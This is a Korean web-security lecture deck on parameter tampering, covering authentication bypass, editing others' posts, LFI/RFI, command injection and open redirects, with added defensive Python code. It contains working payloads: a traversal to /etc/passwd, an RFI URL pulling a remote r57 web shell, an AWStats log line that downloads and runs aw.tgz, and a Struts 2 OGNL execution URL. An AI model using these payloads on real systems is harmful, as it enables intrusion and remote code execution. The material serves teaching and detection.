ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์ 
9์ฃผ์ฐจ ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์ 
์ตœ์ผ์„ 
1E-mail: isc0304@naver.com Writing by Ilsun Choi
Index
1. Overview
2. Case analysis
1) Registration
2) Editing and deleting other users' posts
3) Edit/delete page information exposed in JavaScript
4) File inclusion (LFI/RFI)
5) Command injection
6) URL redirection
3. Lab exercises
1) Detecting command injection vulnerabilities
2) Checking for buffer overflows
Appendix. Direct RET BOF
1. ๊ฐœ์š”
3
์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ
์‚ฌ์šฉ๋˜๋Š” ์ •๋ณด
์‚ฌ์šฉ์ž ์ž…๋ ฅํผ
Query String
HTTP ํ—ค๋”
๊ธฐํƒ€
๋ช…๋ น์–ด ์‚ฝ์ž…
์›๊ฒฉ์ง€ ํŒŒ์ผ ์‚ฝ์ž…
ํƒ€์ธ๊ธ€ ์ˆ˜์ •/์‚ญ์ œ
๋ณ€์กฐ
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„
1) ํšŒ์›๊ฐ€์ž…
2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œํ•˜๊ธฐ
3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋กœ ๊ตฌ์„ฑ๋œ ์ˆ˜์ •/์‚ญ์ œํŽ˜์ด์ง€ ์ •๋ณด ๋…ธ์ถœ
4) ํŒŒ์ผ ์‚ฝ์ž…(LFI/RFI)
5) ๋ช…๋ น์–ด ์‚ฝ์ž…
6) URL Redirection
4E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
โ€ข ์ž…๋ ฅ ๊ฐ’ ๊ฒ€์ฆ์„ ์œ„ํ•œ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ
โ€ข ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์˜ ์˜ˆ
โ€ข ๋น„๊ณต๊ฐœ test site๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹ค์Šตํ•œ ๋‚ด์šฉ์„ ์ •๋ฆฌํ•˜์˜€๋‹ค.
5
if ( a!= b ){
alert(โ€œno hackโ€);
location.href = โ€œ/โ€;
}
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
1) ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ธ์ฆ ์šฐํšŒ
6E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ฒดํฌ ๋กœ์ง์„ ์ฐพ์•„ ์‚ญ์ œ
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
7E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ๋ฅผ ๊ธฐ์ž…ํ•˜์—ฌ
์šฐํšŒ์— ์„ฑ๊ณต
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
8E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
โ€ข ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„์Šค ์šฐํšŒ
โ€ข ํ…Œ์ŠคํŠธ ์„œ๋ฒ„์ด๊ธฐ ๋•Œ๋ฌธ์— ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„
์Šค๊ฐ€ ์กด์žฌํ•˜์ง€ ์•Š๋Š”๋‹ค.
9E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์„ฑ๊ณต์ ์œผ๋กœ ํšŒ์›๊ฐ€์ž…์— ์„ฑ๊ณตํ•œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.
10
2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž…
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ
7.1.1 ํƒ€์ธ ๋น„๋ฐ€ ๊ธ€ ๋ณด๊ธฐ์™€ ์œ ์‚ฌ
๋จผ์ € ์šฐ๋ฆฌ๊ฐ€ ์ด์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒŒ์‹œ๋ฌผ ์ƒ์„ฑ
11E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ๋‚ด๊ฐ€ ์“ด ๊ธ€ ์ˆ˜์ • ํŽ˜์ด์ง€ ์—ด๊ธฐ
12
2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ
E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ํŽ˜์ด์ง€ ์š”์ฒญ์—์„œ 18๋ฒˆ ๊ฒŒ
์‹œ๊ธ€ ๋ณ€๊ฒฝ์„ ์š”์ฒญํ•˜๊ณ  ์žˆ๋‹ค
๋Š” ๊ฒƒ์„ ํ™•์ธ
โ€ข 15๋ฒˆ ๊ฒŒ์‹œ๊ธ€์„ ๋ฐ”๊พธ๊ธฐ ์œ„
ํ•ด ๋ณ€์กฐํ•˜์—ฌ ์ง„ํ–‰
13
2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ
E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ์ˆ˜์ • ํ›„
โ€ข ์‚ญ์ œ ํ›„
14
2. ์‚ฌ๋ก€๋ถ„์„ > ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ, ์ˆ˜์ • ์‚ญ์ œ ํŽ˜์ด์ง€ ๋…ธ์ถœ
15
โ€ข ์‚ญ์ œ๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ํ˜•์‹
โ€ข javascript ๋‚ด์— ์ˆ˜์ •/์‚ญ์ œ ํŽ˜์ด์ง€ ํ™•์ธ ๊ฐ€๋Šฅ
E-mail: isc0304@naver.com Writing by Ilsun Choi
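Added example (not code from the slides or from the test site they describe) that replays cases 1 to 3 in Python: the vulnerable handler trusts what the client sent, the fixed handler looks the post's owner up on the server and compares it with the session. The in-memory board, the user names and post numbers 15 and 18 are constructed for the demonstration.

```python
"""Server-side ownership check for the post edit/delete handlers.

Added example, not code from the slides or from the test site they
describe. The in-memory board, the user names and post numbers 15 and 18
are constructed to replay the tampering shown above.
"""
import copy
from dataclasses import dataclass


class AuthorizationError(Exception):
    pass


@dataclass
class Post:
    post_id: int
    owner: str
    body: str


# Constructed board state: post 15 belongs to "victim", post 18 to "attacker".
BOARD = {
    15: Post(15, "victim", "victim's original text"),
    18: Post(18, "attacker", "attacker's own post"),
}


def edit_post_vulnerable(board, session_user, post_id, owner_field, new_body):
    """The pattern behind cases 1-3: the 'owner' the client sent (a hidden
    form field, or a value a JavaScript check computed) is the only thing
    compared. post_id is trusted as-is, so rewriting 18 to 15 in the proxy
    edits another user's post."""
    if owner_field != session_user:
        raise AuthorizationError("client-supplied owner does not match session")
    board[post_id].body = new_body
    return board[post_id]


def edit_post_fixed(board, session_user, post_id, new_body):
    """Look the owner up on the server and compare it with the authenticated
    session; nothing in the request can change the outcome."""
    post = board.get(post_id)
    if post is None:
        raise KeyError(post_id)
    if post.owner != session_user:
        raise AuthorizationError(f"{session_user} does not own post {post_id}")
    post.body = new_body
    return post


def delete_post_fixed(board, session_user, post_id):
    """Same check before deletion. Returns True on success."""
    post = board.get(post_id)
    if post is None:
        raise KeyError(post_id)
    if post.owner != session_user:
        raise AuthorizationError(f"{session_user} does not own post {post_id}")
    del board[post_id]
    return True


def replay_tampering():
    """Replay the slide: the attacker submits an edit for post 18 and the
    proxy rewrites post_id to 15. Returns (body of post 15 after the
    vulnerable handler, body after the fixed handler, fixed handler refused)."""
    vulnerable_board = copy.deepcopy(BOARD)
    fixed_board = copy.deepcopy(BOARD)
    edit_post_vulnerable(vulnerable_board, "attacker", 15, "attacker", "defaced")
    try:
        edit_post_fixed(fixed_board, "attacker", 15, "defaced")
        refused = False
    except AuthorizationError:
        refused = True
    return vulnerable_board[15].body, fixed_board[15].body, refused


def replay_delete():
    """Deleting: own post 18 succeeds, another user's post 15 is refused."""
    board = copy.deepcopy(BOARD)
    own_ok = delete_post_fixed(board, "attacker", 18)
    try:
        delete_post_fixed(board, "attacker", 15)
        other_refused = False
    except AuthorizationError:
        other_refused = True
    return own_ok, other_refused, 15 in board
```

The fixed handlers never look at an owner value from the request at all; the only inputs are the session identity and the post number, and the owner comes from storage.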
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข RFI: Remote File Inclusion
์™ธ๋ถ€์— ์žˆ๋Š” ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ
-> ์ทจ์•ฝํ•œ ๋กœ์ง(์›น์‰˜๊ณผ ๊ฐ™์€)์„ ๊ฐ€์ ธ์˜ค๊ธฐ ์œ„ํ•จ
โ€ข LFI: Local File Inclusion
์„œ๋ฒ„๋‚ด๋ถ€๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ
-> ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ ๋…ธ์ถœ(์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ)์„ ์œ„ํ•จ
16E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข Default๋Š” Off
โ€ข ๊ฐœ๋ฐœ์ž์˜ ํ•„์š”์— ์˜ํ•ด์„œ On์ด ๋  ์ˆ˜ ์žˆ์Œ.
17E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
LFI ์‚ฌ๋ก€ 1
โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฐ’์— ์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ์˜ ๊ฒฝ๋กœ๋ฅผ ์‚ฝ์ž… (๋‹ค์šด๋กœ๋“œ ์ทจ์•ฝ์ ๊ณผ ์œ ์‚ฌ)
โ€ข ์•„๋ž˜์™€ ๊ฐ™์€ ํ™•์žฅ์ž๋ฅผ ๋ถ™์ด๋Š” ํ˜•์‹
๏ƒ  ๋„๋ฐ”์ดํŠธ ์ธ์ ์…˜์„ ์‚ฌ์šฉ
18
๊ตฌ๋ถ„ ํŒŒ๋ผ๋ฏธํ„ฐ
์›๋ณธ file=php(๋‚ด๋ถ€์ ์œผ๋กœ .abc๊ฐ€ ๋ถ™์–ด, php.abc๋ฅผ ํ˜ธ์ถœ
๋ณ€์กฐ file=../../../../../../etc/passwd%00
๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜
php์–ธ์–ด require(),include(),eval(),passthru(),system(),fopen() ๋“ฑ
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
LFI ์‚ฌ๋ก€ 2
โ€ข ์ œ๋กœ๋ณด๋“œ(xe)์˜ /include/write.php ์—์„œ ๋ฐœ์ƒ๋œ LFI ์ทจ์•ฝ์ 
โ€ข โ€œ://โ€ ์™€ โ€œ..โ€ ๋งŒ์„ ํ•„ํ„ฐ๋งํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒฝ๋กœ๋Š” ์‚ฝ์ž… ๊ฐ€๋Šฅ
c:windowssystem32driveretchosts
19E-mail: isc0304@naver.com Writing by Ilsun Choi
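Added example (not the slides' code, nor Zeroboard's) showing in Python why the case 2 blocklist fails against both slide payloads and how a canonicalising resolver handles them: it refuses NUL bytes and absolute paths, appends the ".abc" extension the slide describes, resolves the result and requires it to stay below the include directory. The directory names are constructed.

```python
"""Hardened local include resolution for LFI cases 1 and 2.

Added example, not the slides' code nor Zeroboard's. The base directory,
the ".abc" extension and the payloads follow the two slides; the
directory names are constructed.
"""
import os

ALLOWED_EXT = ".abc"


def blocklist_filter(value):
    """The filter from LFI case 2: it only rejects '://' and '..'.
    Returns True when the value would be let through."""
    return "://" not in value and ".." not in value


def resolve_include(base_dir, value):
    """Reject NUL bytes and absolute paths, append the extension, canonicalise,
    and require the result to stay below base_dir. Returns the absolute path
    or raises ValueError."""
    if "\x00" in value or "%00" in value.lower():
        raise ValueError("NUL byte in include parameter")
    # os.path.isabs() only knows the host's convention; also catch a Windows
    # drive prefix ("c:\" or "c:/") when the check runs on a POSIX host.
    if os.path.isabs(value) or value[1:3] in (":\\", ":/"):
        raise ValueError("absolute path in include parameter")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value + ALLOWED_EXT))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the include directory")
    return candidate


def evaluate(base_dir=None):
    """Run a legitimate value and the slide payloads through both checks.
    Returns {name: (passes_blocklist, hardened_result)}."""
    base_dir = base_dir or os.path.join(os.getcwd(), "includes")  # constructed
    payloads = {
        "legit": "php",                                      # -> includes/php.abc
        "case1": "../../../../../../etc/passwd%00",          # traversal + NUL
        "traversal": "../../../etc/passwd",                  # traversal alone
        "case2": r"c:\windows\system32\drivers\etc\hosts",   # absolute path
    }
    results = {}
    for name, value in payloads.items():
        try:
            hardened = "allowed: " + resolve_include(base_dir, value)
        except ValueError as exc:
            hardened = "rejected: " + str(exc)
        results[name] = (blocklist_filter(value), hardened)
    return results
```

The blocklist stops case 1 only because of its "..", and lets the Windows absolute path of case 2 straight through; the resolver rejects all three hostile values for three different reasons and still serves the legitimate one.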
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
RFI ์‚ฌ๋ก€ 1
โ€ข ์›๊ฒฉ์ง€์— ์žˆ๋Š” txtํŒŒ์ผ
๏ƒ  ์„œ๋ฒ„ ๋‚ด๋ถ€์—์„œ php๋กœ ์‹คํ–‰
1. null.php ์‹คํ–‰
2. include๋กœ test.txt ํŒŒ์ผ ์ฝ”๋“œ๋ฅผ ๋ถˆ๋Ÿฌ์˜ด
3. null.php๊ฐ€ ๋ถˆ๋Ÿฌ์˜จ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰
20
์‹คํ–‰์ˆœ์„œ
1.
2.
3.
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข ์‰˜ ์ฝ”๋“œ ์ฃผ์†Œ
โ€ข http://www.r57shell.net/shell/r57.txt
21E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข http://192.168.157.130/9ch/null.php?file=http://
www.r57shell.net/shell/r57.txt %00
โ€ข ์ด์ „ ์‚ฌ๋ก€์™€ ๋™์ผํ•œ ๋ฐฉ์‹์œผ๋กœ txt ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ๋“ค
์—ฌ ์‹คํ–‰ํ•จ.
22E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
23
RFI ์‚ฌ๋ก€ 2
โ€ข โ€œ://โ€์„ ํ•„ํ„ฐ๋งํ•˜์—ฌ ์‚ฌ๋ก€(1)๊ณผ ๊ฐ™์€ ์ทจ์•ฝ์ ์„ ๋ฐœ์ƒํ•˜์ง€ ์•Š๋Š”๋‹ค.
โ€ข ๊ทธ๋Ÿฌ๋‚˜, base64๋กœ ์ธ์ฝ”๋”ฉ๋œ phpinfo()์„ ์‚ฝ์ž…ํ•˜๋ฉด php.ini ํŒŒ์ผ ์ •๋ณด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.
๏ƒ  ์ถ”๊ฐ€์ ์ธ ์ทจ์•ฝ์  ๋…ธ์ถœ ๊ฐ€๋Šฅ์„ฑ
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
โ€ข http://192.168.157.130/9ch/null.php?file=data:;base64,PD9waHBpbmZvKCk/PiUwMA==
โ€ข ์‚ฝ์ž…๋œ base64 ์ฝ”๋“œ : <?phpinfo()?>%00
24E-mail: isc0304@naver.com Writing by Ilsun Choi
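Added example (not from the slides) that triages an include parameter value in Python the way a reviewer or a WAF rule would for RFI cases 1 and 2: it percent-decodes the value, classifies it as local, network or stream-wrapper, flags the %00, and for a data: URI decodes the embedded PHP. The sample values are the two slide payloads.

```python
"""Triage of an include parameter value for RFI cases 1 and 2.

Added example, not from the slides. It decodes the value the way PHP's
stream-wrapper layer sees it, classifies it, and for a data: URI recovers
the embedded PHP source. The sample values are the two slide payloads.
"""
import base64
import urllib.parse

NETWORK_SCHEMES = {"http", "https", "ftp", "ftps"}
# Wrappers PHP can include from; "data" and "php" carry attacker input
# without any "://" in the value.
WRAPPER_SCHEMES = {"data", "php", "expect", "phar", "glob",
                   "compress.zlib", "compress.bzip2"}


def classify_include(value):
    """Return a dict: class is 'local', 'remote' or 'wrapper'; payload holds
    the decoded PHP source for a data: URI; nul_byte flags a %00."""
    decoded = urllib.parse.unquote(value)
    finding = {"raw": value, "decoded": decoded, "class": "local",
               "scheme": None, "payload": None, "nul_byte": "\x00" in decoded}
    scheme, sep, rest = decoded.partition(":")
    scheme = scheme.lower()
    if sep and scheme in NETWORK_SCHEMES:
        finding.update({"class": "remote", "scheme": scheme})
    elif sep and scheme in WRAPPER_SCHEMES:
        finding.update({"class": "wrapper", "scheme": scheme})
    if finding["scheme"] == "data":
        # data:[<mediatype>][;base64],<data>
        header, _, body = rest.partition(",")
        if header.endswith(";base64"):
            finding["payload"] = base64.b64decode(body)
        else:
            finding["payload"] = body.encode()
    return finding


def blocklist_filter(value):
    """The filter from RFI case 2: rejects anything containing '://'."""
    return "://" not in value


def triage(values):
    """Summarise several values as (class, scheme, passes_blocklist)."""
    return [(f["class"], f["scheme"], blocklist_filter(v))
            for v, f in ((v, classify_include(v)) for v in values)]
```

Note that the decoded payload has no space after "<?php", so it parses as a short "<?" open tag followed by phpinfo() and relies on short_open_tag being enabled; a fixed "<?php phpinfo(); ?>" does not have that dependency.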
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
25
โ€ข ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋Š” php.ini ์„ค์ • ๋ชฉ๋ก
โ€ป ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๊ต์žฌ p288 ํ™•์ธํ•˜๋ฉด ๋œ๋‹ค.
์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’ ์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’
register_globals Off magic_quotes_sybase Off
safe_mode On open_basedir ๋””๋ ‰ํ„ฐ๋ฆฌ
safe_mode_gid Off safe_mode_exec_dir ๋””๋ ‰ํ„ฐ๋ฆฌ
expose_php Off display_errors Off
file_uploads Off log_errors On
allow_url_fopen Off error_log ํŒŒ์ผ๋ช…
magic_quotes_gpc On
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
1) PHP exec ํ•จ์ˆ˜
๋ง˜๋ณด(Mambo) ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์ 
26
mkidr
E-mail: isc0304@naver.com Writing by Ilsun Choi
2) Perl open() function: attack log against the awstats.pl page of the AWStats application
1. The id command is run to check the account's privileges.
2. A remote file (aw.tgz) is fetched and a malicious program (inetd) is executed.

  1  66.99.250.98 - - [24/Feb/2005:02:20:45 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
  2  213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zx... HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

  Line 2 decoded:
  configdir= | cd /tmp; wget www.shady.go.ro/aw.tgz; tar zxf aw.tgz; rm -f aw.tgz; cd aw; ./inetd |

The "|" at either end is what makes Perl's two-argument open() treat the configdir value as a command pipeline instead of a file name.
3) Apache Struts 2 (Java web application framework) remote code execution
• http://seclists.org/fulldisclosure/2013/Oct/96
• A crafted OGNL expression is passed in a parameter whose name carries the "action:", "redirect:" or "redirectAction:" prefix:

  http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Decoded, the expression starts whoami through ProcessBuilder, reads its output, and writes the application's real path into the HTTP response.
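Added example (not from the slides) with the detection logic a SOC would run over access logs for the two patterns above: it parses combined-format lines, percent-decodes each query parameter, and flags shell metacharacters in values (the AWStats open() pipe) and OGNL markers or Struts prefix names (the Struts 2 case). The log lines are constructed after the slide's (private source addresses, same request shapes), not copied from a real server.

```python
"""Access-log detection for the AWStats and Struts 2 patterns above.

Added example, not from the slides. The log lines are constructed after
the two on the slide and the Struts 2 request (private source addresses,
same request shapes); they are not copied from a real server.
"""
import re
import urllib.parse

# Combined Log Format; target is everything up to the protocol
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# '|' at either end is the two-argument open() pipe trick; ; & ` $( chain
# commands in a shell
SHELL_META = re.compile(r"[|;&`]|\$\(")
# Struts 2 parameter-name prefixes handled by the action mapper, and the
# OGNL expression markers
OGNL_PREFIX = re.compile(r"^(action|redirect|redirectAction|method):", re.I)
OGNL_EXPR = re.compile(r"[$%]\{")

SAMPLE_LOG = """\
10.0.0.5 - - [24/Feb/2005:02:20:45 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.6 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20.%2finetd%20%7c HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10.0.0.7 - - [17/Oct/2013:09:01:12 +0000] "GET /continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start()} HTTP/1.1" 200 0 "-" "curl/7.30.0"
10.0.0.8 - - [17/Oct/2013:09:02:00 +0000] "GET /cgi-bin/awstats.pl?config=site1&output=main HTTP/1.1" 200 8122 "-" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return a list of findings for one log line (empty for clean lines)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    findings = []
    for name, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        # A key-only pair (no '=') comes back as a name with an empty value,
        # which is exactly how a Struts "redirect:${...}" parameter arrives.
        if OGNL_PREFIX.match(name) or OGNL_EXPR.search(name + value):
            reason = "ognl expression"
        elif SHELL_META.search(value):
            reason = "shell metacharacter"
        else:
            continue
        findings.append({"ip": m.group("ip"), "status": m.group("status"),
                         "path": path, "param": name, "reason": reason,
                         "decoded": (value or name).strip()})
    return findings


def scan(lines):
    """Run analyse_line over an iterable of log lines."""
    return [f for line in lines for f in analyse_line(line)]
```

The 404 on the first AWStats line is worth keeping in the output: a response code says nothing about whether the injected command ran, since awstats.pl executes the pipeline before it decides what page to return.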
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
4) ASP ์‰˜ ์ฝ”๋“œ
5) PHP ์‰˜ ์ฝ”๋“œ
29E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
5) JSP ์‰˜ ์ฝ”๋“œ
30E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
์–ธ์–ด๋ณ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ : ์•„๋ž˜ ํ•จ์ˆ˜ ์‚ฌ์šฉ์‹œ ์ฃผ์˜๊ฐ€ ํ•„์š”ํ•จ
31
๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜
PHP require(), include(), eval(), exec(), passthru(), system(), fopen ๋“ฑ
PERL open(), sysopen(), glob(), system() ๋“ฑ
JAVA system.* (system.runtime) ๋“ฑ
C system(), exec(), strcpy(), strcat(), sprint() ๋“ฑ
PYTHON exec(), eval(), execfile(), compile(), input() ๋“ฑ
E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฐ›์€ URL ์ฃผ์†Œ๋กœ ํŽ˜์ด์ง€ ์ด๋™
โ€ข ํ”ผ์‹ฑ ์œ„ํ—˜
โ€ข ํ˜•ํƒœ
http://์‹ ๋ขฐํ• ์ˆ˜์žˆ๋Š”์‚ฌ์ดํŠธ/redirect.asp?target=http://malicious.com
Phishing์ด๋ž€?
Private Data + fishing์˜ ํ•ฉ์„ฑ์–ด
์ด๋ฉ”์ผ ๋˜๋Š” ์ŠคํŒธ ๋“ฑ์„ ๋ฐœ์†ก ๋ฐ ์ ‘์†์ž๋“ค์„ ํŠน์ • ์‚ฌ์ดํŠธ์™€ ๋™์ผํ•œ ๊ฐ€์งœ ์‚ฌ์ดํŠธ๋กœ ์ ‘์†
๏ƒ  ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ, ์€ํ–‰ ๊ณ„์ขŒ ํ˜น์€ ์‹ ์šฉ์นด๋“œ ๋ฒˆํ˜ธ ํƒˆ์ทจ
Phishing์˜ ์œ ๋ž˜
1996๋…„ AOL(American Online)์„ ์‚ฌ์šฉํ•˜๋˜ 10๋Œ€๋“ค์ด ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž์—๊ฒŒ ๊ฐ€์งœ ์ด๋ฉ”์ผ์„ ๋ณด๋‚ด๋Š” ํ•ดํ‚น ๊ธฐ
๋ฒ•์œผ๋กœ ์œ ๋ž˜๋จ.
32E-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
โ€ข ๋ณด์•ˆ ๋‰ด์Šค ์ฐธ๊ณ  ๊ธฐ์‚ฌ : http://www.boannews.com/media/view.asp?idx=45812
โ€ข ์Œ๋ž€ ๋™์˜์ƒ ํด๋ฆญ ์‹œ ํ”ผ์‹ฑ ์„œ๋ฒ„๋กœ ์ด๋™
โ€ข ํŽ˜์ด์Šค๋ถ๊ณผ ๋˜‘๊ฐ™์ด ์ƒ๊ธด UI๋กœ ID/Password ์š”์ฒญ
